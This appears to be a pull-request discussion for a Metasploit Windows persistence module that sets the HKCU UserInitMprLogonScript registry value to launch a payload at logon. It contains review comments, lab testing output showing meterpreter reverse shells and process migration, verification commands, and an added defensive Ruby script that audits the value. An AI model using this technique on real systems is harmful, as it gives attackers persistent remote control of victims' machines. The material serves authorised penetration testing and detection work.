windows persistence userinit_mpr_logon#21032
| fail_with(Failure::UnexpectedReply, "Error writing payload to: #{payload_pathname}") unless write_file(payload_pathname, payload_exe) | ||
|
|
||
| old_value = registry_getvaldata(regkey, 'UserInitMprLogonScript') | ||
| registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ') |
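Review bot: `old_value` is read from `UserInitMprLogonScript` but nothing in the visible lines uses it, and the `registry_setvaldata` call is not checked, unlike `write_file` just above, which is wrapped in `fail_with`. If the read is meant for cleanup, have the cleanup RC restore the prior value rather than delete the value when a legitimate logon script was already configured, and guard the set the same way, e.g. `fail_with(Failure::Unknown, "Could not set UserInitMprLogonScript") unless registry_setvaldata(regkey, 'UserInitMprLogonScript', payload_pathname, 'REG_SZ')`.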
Curious how much space we are allowed here? Could we base64 encode the binary payload, echo it to the temp directory, then execute it?
REG_SZ values can be large (~1 MB); UserInitMprLogonScript is executed as a command at logon, so it is constrained by Windows command line limits. Microsoft documents ~8191 characters for cmd.exe and about 32767 for the underlying Windows API (CreateProcess). Since base64 increases payload size by ~33%, embedding a full binary payload in the registry value would likely exceed these limits.
Dependent on #21049
modules/exploits/windows/persistence/userinit_mpr_logon_script.rb
01f27bf to 6a1c643
smcintyre-r7 left a comment
Changes look good now and I was able to successfully test the module. I'll have this landed in a moment.
Testing Output
msf exploit(windows/persistence/userinit_mpr_logon_script) > show options
Module options (exploit/windows/persistence/userinit_mpr_logon_script):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no Name of payload file to write. Random string as default.
SESSION -1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
(reverse-i-search)` set': useInterrupt: use the 'exit' command to quit
msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/userinit_mpr_logon_script) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[-] Handler failed to bind to 192.168.159.128:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Windows\TEMP\yozkGTE.exe
[*] Meterpreter-compatible Cleanup RC file: /home/smcintyre/.msf4/logs/persistence/DC_20260401.5451/DC_20260401.5451.rc
msf exploit(windows/persistence/userinit_mpr_logon_script) >
msf exploit(windows/persistence/userinit_mpr_logon_script) > show options
Module options (exploit/windows/persistence/userinit_mpr_logon_script):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no Name of payload file to write. Random string as default.
SESSION -1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.159.128:4444
1 Exploit: windows/persistence/userinit_mpr_logon_script windows/x64/meterpreter/reverse_tcp tcp://192.168.159.128:4444 (setting up)
msf exploit(windows/persistence/userinit_mpr_logon_script) > sessions -i -1
[*] Starting interaction with 1...
meterpreter > ls C:\\Windows\\TEMP
Listing: C:\Windows\TEMP
========================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 0 fil 2026-03-31 11:46:35 -0400 BUPBGDNjeF.txt
040777/rwxrwxrwx 0 dir 2024-06-11 16:22:44 -0400 CA1B4E57-871F-4E0C-945B-7FA7964DA012
100666/rw-rw-rw- 0 fil 2026-04-01 14:29:59 -0400 EEtoXVqiauOsWNgl.txt
100777/rwxrwxrwx 197632 fil 2026-04-01 14:31:37 -0400 HAjFCqjL.exe
100666/rw-rw-rw- 934736 fil 2026-04-01 12:57:37 -0400 MpCmdRun.log
100666/rw-rw-rw- 315310 fil 2026-04-01 12:57:05 -0400 MpSigStub.log
100777/rwxrwxrwx 197632 fil 2026-03-31 11:46:16 -0400 MxVtAwgcRh.exe
100777/rwxrwxrwx 197632 fil 2026-04-01 14:30:52 -0400 NSAUiOEFsht.exe
100666/rw-rw-rw- 0 fil 2026-04-01 14:31:37 -0400 SLYtMOatookFpT.txt
100777/rwxrwxrwx 197632 fil 2026-03-31 11:46:35 -0400 WnPCwxcWsQ.exe
100666/rw-rw-rw- 0 fil 2026-04-01 14:33:12 -0400 XlLZuWCT.txt
100666/rw-rw-rw- 0 fil 2026-04-01 14:30:52 -0400 XvDGTAexlGCd.txt
100777/rwxrwxrwx 239104 fil 2026-04-01 14:33:12 -0400 aToqzlrkMJl.exe
100666/rw-rw-rw- 53 fil 2026-04-01 12:46:34 -0400 bb3a785178f443fda931098a5a9a306b.db.ses
100777/rwxrwxrwx 239104 fil 2026-04-01 14:29:59 -0400 iDjtbgQPs.exe
100666/rw-rw-rw- 0 fil 2026-03-31 11:46:16 -0400 sCoOOlxASHS.txt
100666/rw-rw-rw- 102 fil 2026-04-01 12:47:17 -0400 silconfig.log
040777/rwxrwxrwx 0 dir 2026-03-31 11:43:33 -0400 vmware-SYSTEM
100666/rw-rw-rw- 421473 fil 2026-04-01 12:46:34 -0400 vmware-vmsvc-SYSTEM.log
100666/rw-rw-rw- 8330 fil 2026-04-01 12:46:33 -0400 vmware-vmtoolsd-SYSTEM.log
100666/rw-rw-rw- 2940 fil 2026-04-01 14:55:32 -0400 vmware-vmtoolsd-smcintyre.log
100666/rw-rw-rw- 98454 fil 2026-04-01 14:55:43 -0400 vmware-vmusr-smcintyre.log
100666/rw-rw-rw- 8177 fil 2026-04-01 12:46:36 -0400 vmware-vmvss-SYSTEM.log
100777/rwxrwxrwx 7680 fil 2026-04-01 14:54:50 -0400 yozkGTE.exe
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
84 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
104 4 Registry x64 0
308 4 smss.exe x64 0
376 2488 sihost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\sihost.exe
420 408 csrss.exe x64 0
520 596 dwm.exe x64 1 Window Manager\DWM-1 C:\Windows\System32\dwm.exe
524 408 wininit.exe x64 0
532 516 csrss.exe x64 1
596 516 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
664 668 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
668 524 services.exe x64 0
688 524 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
712 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
824 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
888 940 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
904 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
924 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
940 344 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
968 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1012 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1032 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1084 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1100 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1124 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1144 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1188 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1276 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1328 924 ShellExperienceHost.exe x64 1 MSFLAB\smcintyre C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
1420 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1428 4940 ServerManager.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\ServerManager.exe
1496 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1536 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1568 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1576 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1584 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1668 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1724 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1772 668 svchost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\svchost.exe
1828 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1848 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1868 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1940 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1984 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1992 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2000 380 explorer.exe x64 1 MSFLAB\smcintyre C:\Windows\explorer.exe
2040 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2068 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2072 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2188 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
2196 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2276 668 svchost.exe x64 0
2328 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2384 924 SearchUI.exe x64 1 MSFLAB\smcintyre C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
2488 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2520 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2736 924 WmiPrvSE.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2804 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2964 524 fontdrvhost.exe x64 0 Font Driver Host\UMFD-0 C:\Windows\System32\fontdrvhost.exe
2968 596 fontdrvhost.exe x64 1 Font Driver Host\UMFD-1 C:\Windows\System32\fontdrvhost.exe
3124 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3132 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3140 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3148 668 certsrv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\certsrv.exe
3160 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3224 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3236 668 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
3256 668 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
3308 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
3320 668 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
3328 668 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
3388 668 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
3396 668 inetinfo.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\inetsrv\inetinfo.exe
3404 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3412 668 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
3424 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3440 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
3480 668 vm3dservice.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vm3dservice.exe
3492 668 MsMpEng.exe x64 0
3516 668 sshd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\OpenSSH\sshd.exe
3528 668 MpDefenderCoreService.exe x64 0
3632 668 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
3648 668 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
3724 668 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
3796 924 RuntimeBroker.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\RuntimeBroker.exe
3824 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4108 3480 vm3dservice.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\vm3dservice.exe
4124 924 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
4380 924 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4384 668 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
4528 668 sqlceip.exe x64 0 NT SERVICE\SQLTELEMETRY C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlceip.exe
4544 668 sqlservr.exe x64 0 NT SERVICE\MSSQLSERVER C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe
4620 668 dllhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dllhost.exe
4732 668 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
4792 1940 ctfmon.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\ctfmon.exe
4932 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
4960 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5080 924 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
5380 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5604 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5756 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
5796 924 RuntimeBroker.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\RuntimeBroker.exe
5848 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
5980 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
6252 924 backgroundTaskHost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\backgroundTaskHost.exe
6288 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
6316 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
6396 1828 taskhostw.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\taskhostw.exe
6408 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
6520 924 RuntimeBroker.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\RuntimeBroker.exe
6824 668 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
6896 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
6912 668 svchost.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\svchost.exe
7112 668 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
7236 924 smartscreen.exe x64 1 MSFLAB\smcintyre C:\Windows\System32\smartscreen.exe
7308 2000 vmtoolsd.exe x64 1 MSFLAB\smcintyre C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
7424 7380 jusched.exe x86 1 MSFLAB\smcintyre C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
meterpreter > migrate 6912
[*] Migrating from 940 to 6912...
[*] Migration completed successfully.
meterpreter > background
[*] Backgrounding session 1...
msf exploit(windows/persistence/userinit_mpr_logon_script) > show options
Module options (exploit/windows/persistence/userinit_mpr_logon_script):
Name Current Setting Required Description
---- --------------- -------- -----------
PAYLOAD_NAME no Name of payload file to write. Random string as default.
SESSION -1 yes The session to run this module on
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf exploit(windows/persistence/userinit_mpr_logon_script) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > run
[*] Exploit running as background job 2.
msf exploit(windows/persistence/userinit_mpr_logon_script) >
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[!] Payload handler is disabled, the persistence will be installed only.
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\SMCINT~1\AppData\Local\Temp\pHUNXGBwHWmT.exe
[*] Meterpreter-compatible Cleanup RC file: /home/smcintyre/.msf4/logs/persistence/DC_20260401.5643/DC_20260401.5643.rc
[*] 192.168.159.10 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (244806 bytes) to 192.168.159.10
msf exploit(windows/persistence/userinit_mpr_logon_script) >
msf exploit(windows/persistence/userinit_mpr_logon_script) > [*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.10:53820) at 2026-04-01 14:57:01 -0400
msf exploit(windows/persistence/userinit_mpr_logon_script) >
Thanks for submitting this to us!
This has been rebased so the library changes have been implemented and the old pattern removed.
Release Notes
This adds a new Windows persistence module that abuses the
This PR fixes #20821 by implementing a new Windows persistence module that abuses the HKCU\Environment\UserInitMprLogonScript registry value to execute a payload at user logon.
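The PR description above explains the technique (a command stored in HKCU\Environment\UserInitMprLogonScript runs at user logon) and the review thread earlier explains why the value is bounded by command line limits rather than by REG_SZ size. The following is an added defender-side example, not code from the PR or from the Metasploit module: it parses constructed `reg query HKCU\Environment` output, reports whether the logon script value is set and whether it points into a temp directory, and applies the cmd.exe and CreateProcess limits cited in the thread to show why a base64 encoded binary does not fit inline. The sample output, the suspicious-directory patterns and all function names are assumptions of this example.

```ruby
require 'base64'

# Command line limits cited in the PR discussion. A value in
# HKCU\Environment\UserInitMprLogonScript runs as a logon command, so these,
# not the ~1 MB REG_SZ ceiling, bound what can usefully be stored there.
CMD_EXE_LIMIT        = 8191
CREATE_PROCESS_LIMIT = 32_767

# Directories the module writes its payload to in the testing output above;
# a logon script launched from either deserves a second look. (Assumption of
# this example, not a list maintained by the project.)
SUSPICIOUS_DIRS = [/\\Windows\\TEMP\\/i, /\\AppData\\Local\\Temp\\/i].freeze

# Constructed sample of `reg query HKCU\Environment` output; the logon script
# line mirrors the path reported in the testing output above.
SAMPLE_REG_QUERY = <<~'OUT'
  HKEY_CURRENT_USER\Environment
      OneDrive    REG_SZ    C:\Users\smcintyre\OneDrive
      Path    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Microsoft\WindowsApps
      TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
      TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
      UserInitMprLogonScript    REG_SZ    C:\Windows\TEMP\yozkGTE.exe
OUT

# Parse reg.exe's text output into { name => { type:, data: } }.
# Value lines are indented and laid out as "name    REG_TYPE    data";
# data may contain spaces, value names are assumed not to.
def parse_reg_query(output)
  entries = {}
  output.each_line do |line|
    m = line.match(/\A\s{2,}(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*\z/)
    next unless m
    entries[m[1]] = { type: m[2], data: m[3] }
  end
  entries
end

# Report on UserInitMprLogonScript: whether it is set, what it would run,
# and whether the command points into a temp directory. Environment
# variables in a REG_EXPAND_SZ value are not expanded here.
def audit_logon_script(entries)
  entry = entries['UserInitMprLogonScript']
  return { present: false } unless entry

  command = entry[:data]
  {
    present: true,
    type: entry[:type],
    command: command,
    length: command.length,
    fits_cmd_exe: command.length <= CMD_EXE_LIMIT,
    suspicious_location: SUSPICIOUS_DIRS.any? { |re| command.match?(re) }
  }
end

# The size question from the review thread: a binary of +size+ bytes,
# base64 encoded without line breaks, occupies this many characters
# if placed inline in the logon command.
def base64_fits_command_line?(size)
  encoded_length = Base64.strict_encode64("\0" * size).length
  {
    encoded_length: encoded_length,
    fits_cmd_exe: encoded_length <= CMD_EXE_LIMIT,
    fits_create_process: encoded_length <= CREATE_PROCESS_LIMIT
  }
end

if $PROGRAM_NAME == __FILE__
  report = audit_logon_script(parse_reg_query(SAMPLE_REG_QUERY))
  puts "UserInitMprLogonScript set: #{report[:present]}"
  puts "  runs: #{report[:command]} (temp directory: #{report[:suspicious_location]})" if report[:present]
  # 7680 bytes is the size of yozkGTE.exe in the directory listing above
  puts "base64 of a 7680 byte exe: #{base64_fits_command_line?(7680)}"
end
```

Run against real output (`reg query HKCU\Environment` on the host, or the value collected through whatever EDR or inventory tooling is in use), the audit flags the presence of the value at all, since most users never have a logon script configured through this key, and the temp-directory check catches the paths the testing output shows the module using. Expanding `%USERPROFILE%` style variables before the path check is left out on purpose; do that in the collector where the user's environment is known.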
Verification
msfconsole
use exploit/windows/persistence/userinit_mpr_logon_script
set SESSION <id>
set LHOST <attacker_ip>
set LPORT <attacker_port>
set PAYLOAD_NAME updater
set WRITABLEDIR C:\\Users\\<user_name>\\AppData\\Roaming
set CleanUpRc true
set VERBOSE true
check
run
A scenario example in the documentation